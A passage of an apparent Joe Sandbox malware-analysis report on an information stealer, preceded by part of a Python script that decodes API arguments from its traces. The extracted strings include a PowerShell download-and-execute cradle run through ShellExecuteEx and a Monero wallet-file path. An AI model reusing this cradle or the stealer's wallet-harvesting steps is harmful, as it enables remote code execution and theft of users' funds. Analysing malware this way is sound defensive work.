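        notes.append(f"{where}: hKey={HKEYS[a[0]]}")
    if name == "regopenkeyexa" and isinstance(a[3], int):
        sam, parts = a[3], []
        if (sam & KEY_READ) == KEY_READ:
            parts.append("KEY_READ")
            sam &= ~KEY_READ
        if sam & KEY_WOW64_64KEY:  # a 32-bit process asking for the 64-bit registry view
            parts.append("KEY_WOW64_64KEY")
            sam &= ~KEY_WOW64_64KEY
        notes.append(f"{where}: samDesired={'|'.join(parts + ([hex(sam)] if sam else []))}")
    if name == "regqueryvalueexa" and isinstance(a[1], str):
        notes.append(f"{where}: lpValueName={a[1]!r}")
    if name == "internetopenurla" and isinstance(a[4], int):
        notes.append(f"{where}: dwFlags={flag_names(a[4], INET_FLAGS)}")
    if name == "createfilea" and isinstance(a[1], int):
        notes.append(f"{where}: dwDesiredAccess={flag_names(a[1], ACCESS)}")
    if name == "shgetfolderpatha" and isinstance(a[1], int):
        notes.append(f"{where}: csidl={CSIDL.get(a[1], hex(a[1]))}")
    if name == "getprocessheap" and isinstance(a[1], int) and len(call["args"]) == 2:
        # GetProcessHeap takes no arguments; the two words are the stack at the call, which in this
        # binary line up with the RtlAllocateHeap(flags, size) that follows (assumption of this script).
        notes.append(f"{where}: probable RtlAllocateHeap size={a[1]:#x}" + (" (MAX_PATH)" if a[1] == 0x104 else ""))
    return notes

def summarize(block):
    """Parse one function's API listing into its calls, capability tags and decoded constants."""
    calls = [c for c in map(parse_api_line, block.splitlines()) if c]
    tags = sorted({CAPABILITIES[c["name"].lower()] for c in calls if c["name"].lower() in CAPABILITIES})
    return {"calls": calls, "tags": tags, "notes": [n for c in calls for n in decode(c)]}

# Sample input copied from the listings above: WinINet fetch, subkey-enumeration loop, CurrentBuildNumber query.
SAMPLE_DOWNLOAD = """\
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003B4FCA
• InternetOpenA.WININET(003D0DDF,00000000,00000000,00000000,00000000), ref: 003B4FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003B5011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 003B5041
"""
SAMPLE_REGISTRY = """\
• RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
• wsprintfA.USER32 ref: 003C8459
• RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
  • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
"""
SAMPLE_OSVER = """\
• RegOpenKeyExA.ADVAPI32(80000002,0107C3C8,00000000,00020119,003C76B9), ref: 003C775B
• RegQueryValueExA.ADVAPI32(003C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003C777A
"""
```

Run `summarize(SAMPLE_DOWNLOAD)` and the InternetOpenUrlA word 04000100 decodes to INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE, i.e. the fetch bypasses the WinINet cache in both directions; `summarize(SAMPLE_OSVER)` reports hKey=HKEY_LOCAL_MACHINE with samDesired=KEY_READ|KEY_WOW64_64KEY, a 32-bit process deliberately opening the native 64-bit registry view, and the resolved value name CurrentBuildNumber. Two caveats: the key path on that line is only a pointer (0107C3C8) in the trace, so it has to be read out of the dump rather than inferred, and the capability tags are keyed on API names alone, so a function that calls InternetReadFile on a local file will still be tagged as a network client.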
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: 8e67dfc4c9cf26bcf4677865a802ab057db95e7083436d92cacc753c323111f6
                            • Instruction ID: e2f42c8b02739d272f473e341a8f99a3c6c469481726a941f898ed505b90658c
                            • Opcode Fuzzy Hash: 8e67dfc4c9cf26bcf4677865a802ab057db95e7083436d92cacc753c323111f6
                            • Instruction Fuzzy Hash: 3341D4B151079C5EDB228B248C95FFBBBECAB45704F1854ACE98AC6182E3719E45CF60
                            APIs
                            • lstrcat.KERNEL32(?,0108E470), ref: 003C47DB
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4801
                            • lstrcat.KERNEL32(?,?), ref: 003C4820
                            • lstrcat.KERNEL32(?,?), ref: 003C4834
                            • lstrcat.KERNEL32(?,0107B8D8), ref: 003C4847
                            • lstrcat.KERNEL32(?,?), ref: 003C485B
                            • lstrcat.KERNEL32(?,0108DC00), ref: 003C486F
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003C8D90: GetFileAttributesA.KERNEL32(00000000,?,003B1B54,?,?,003D564C,?,?,003D0E1F), ref: 003C8D9F
                              • Part of subcall function 003C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C4580
                              • Part of subcall function 003C4570: RtlAllocateHeap.NTDLL(00000000), ref: 003C4587
                              • Part of subcall function 003C4570: wsprintfA.USER32 ref: 003C45A6
                              • Part of subcall function 003C4570: FindFirstFileA.KERNEL32(?,?), ref: 003C45BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 9b5bdccf638b4d49314775c46bd5f3c8c409f914950d2b0e980101c8c8b3549f
                            • Instruction ID: 24a7359c6c179f93f47c6698a11a5820c73afce746a8abcb13f9322e16690519
                            • Opcode Fuzzy Hash: 9b5bdccf638b4d49314775c46bd5f3c8c409f914950d2b0e980101c8c8b3549f
                            • Instruction Fuzzy Hash: 793143B690021857CB16F7B0DC85FE9737CAB58700F40498DB359EA081EEB59B89CB96
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C2D85
                            Strings
                            • ')", xrefs: 003C2CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 003C2D04
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 003C2CC4
                            • <, xrefs: 003C2D39
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: b452a3f3a233318b3e1ea3c401c9dea3fba60abdddf56c0a896aee19f741e9cd
                            • Instruction ID: 1baca096cccafe71e904b938fff64564023542f6a8f27384a31008c03ba9c909
                            • Opcode Fuzzy Hash: b452a3f3a233318b3e1ea3c401c9dea3fba60abdddf56c0a896aee19f741e9cd
                            • Instruction Fuzzy Hash: B141CC71C1060C9BDB1AEBA0D896FEDBB78AF10704F40411DE016EA191DF746E4ADF96
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 003B9F41
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: 65e150af54737989d2e09665f6a818df84f69de85e66e06cb3236063f0dd3d09
                            • Instruction ID: 9de37fc6a46b800efa269d188509a261dd900f573fac552120c8a2f4f764116d
                            • Opcode Fuzzy Hash: 65e150af54737989d2e09665f6a818df84f69de85e66e06cb3236063f0dd3d09
                            • Instruction Fuzzy Hash: 5C615E71A1064CABDB25EFA4DC96FED7779AF44308F008018FA0A9F581EB746E05CB52
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • memset.MSVCRT ref: 003C716A
                            Strings
                            • s<, xrefs: 003C72AE, 003C7179, 003C717C
                            • s<, xrefs: 003C7111
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003C718C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemset
                            • String ID: s<$s<$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 4047604823-1540657006
                            • Opcode ID: 215c5ac04855c4ce4d09fcf5ff17aeda9f0ad0da046d0ee9969a375389f8c325
                            • Instruction ID: d0a7fb6fde45ae55f8a2b24a0b03289bccba9b92976ce2bb118dae05cb620cbc
                            • Opcode Fuzzy Hash: 215c5ac04855c4ce4d09fcf5ff17aeda9f0ad0da046d0ee9969a375389f8c325
                            • Instruction Fuzzy Hash: 40518FB1C0420C9BDB25EBA0DC81FEEB774AF54304F1444ADE605BA281EB746E88CF55
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C7E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,0107C160,00000000,00020119,?), ref: 003C7E5E
                            • RegQueryValueExA.ADVAPI32(?,0108DBC0,00000000,00000000,000000FF,000000FF), ref: 003C7E7F
                            • RegCloseKey.ADVAPI32(?), ref: 003C7E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 5b34ea4eecd0326288590d2f71ca95e0273495d980ad2beb0b199cd3f5f22713
                            • Instruction ID: e85c1ecc16446364ce3b0934064599ffd3f32c8200985fa44f81ad494593a789
                            • Opcode Fuzzy Hash: 5b34ea4eecd0326288590d2f71ca95e0273495d980ad2beb0b199cd3f5f22713
                            • Instruction Fuzzy Hash: C3114CB2A44205EBD704DB94DD49FBBBBBCEB08B10F104159FA09E7680D7B85C04DBA2
                            APIs
                            • StrStrA.SHLWAPI(0108E410,?,?,?,003C140C,?,0108E410,00000000), ref: 003C926C
                            • lstrcpyn.KERNEL32(005FAB88,0108E410,0108E410,?,003C140C,?,0108E410), ref: 003C9290
                            • lstrlen.KERNEL32(?,?,003C140C,?,0108E410), ref: 003C92A7
                            • wsprintfA.USER32 ref: 003C92C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 43bbc4e00f3d87f035240d7bcb3cd580fdf1c456c17d71b724d14466df224437
                            • Instruction ID: 0afc4a1688e52f8033987f338d3e6cc24220bfc69061f57e63b56b8b7216a11a
                            • Opcode Fuzzy Hash: 43bbc4e00f3d87f035240d7bcb3cd580fdf1c456c17d71b724d14466df224437
                            • Instruction Fuzzy Hash: 9301A5B650010CFFCB04DFE8D988EAE7BB9EB58354F108548F9099B204C675AA45DB96
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003B12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003B12F5
                            • RegCloseKey.ADVAPI32(?), ref: 003B12FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 6de1493ff53a7841456354805197d34e730598b01b74fe04cfc5db21e95b20e3
                            • Instruction ID: de461f1f6d01fa5fd4c0b9d25407f97388ca57e1dd61a45cad1a211111890de7
                            • Opcode Fuzzy Hash: 6de1493ff53a7841456354805197d34e730598b01b74fe04cfc5db21e95b20e3
                            • Instruction Fuzzy Hash: E1011DB9A40208BBDB00DFE0DC59FAEB7B8EB58705F008159FA09D7280D674AA05DB52
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 003C6663
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C6726
                            • ExitProcess.KERNEL32 ref: 003C6755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 96215c5bfe0e19741e2a98074174527409f348d80b52c97200398a2a5d20273e
                            • Instruction ID: de3325791a949387feadf2249f35d5502da3860e8254146ed7fdc4e3064caf6a
                            • Opcode Fuzzy Hash: 96215c5bfe0e19741e2a98074174527409f348d80b52c97200398a2a5d20273e
                            • Instruction Fuzzy Hash: 17312BB1801218ABDB15EB90DC96FEEB778AF14304F404189F209AA191DF746F49CF6A
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003D0E28,00000000,?), ref: 003C882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C8836
                            • wsprintfA.USER32 ref: 003C8850
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
